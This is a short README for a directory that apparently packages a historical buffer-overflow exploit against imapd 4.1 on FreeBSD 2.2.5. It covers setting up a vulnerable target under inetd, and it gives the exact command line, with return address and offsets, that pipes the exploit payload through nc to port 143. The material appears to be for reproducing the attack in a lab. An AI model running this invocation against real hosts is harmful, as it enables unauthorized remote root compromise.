This directory contains 

  *1. imapd-4.1  - (IMAP4rev1 v10.234) binary for freebsd 2.2.5
   2. imapd4.txt - the exploitation file got from rootshell
   3. imappy.c   - the c program that contain the exploitation
  *4. imappy     - the binary       

(imapd-4.1 and the imappy binary are not included with the source
distribution because of their size)

To set up the target host, 

   1.  copy imapd-4.1 to /usr/local/libexec/imapd-4.1
   2.  edit /etc/inet.conf to add the line

       imap2   stream  tcp  nowait  root  /usr/local/libexec/imapd-4.1  imapd

       or modify it if the imap2 line already exists. 
   3.  kill -HUP  xyz, where xyz is the pid of inetd

  
To do the exploitation, do the following from any remote machine,

(imappy 403 0xefbfd4b8 100 ; cat ) | nc TARGET_HOSTNAME 143

e.g.,  (imappy 403 0xefbfd4b8 100 ; cat ) | nc litmus.ba.tis.com 143   


You also need the program nc, which can be obtained from the freebsd
network package


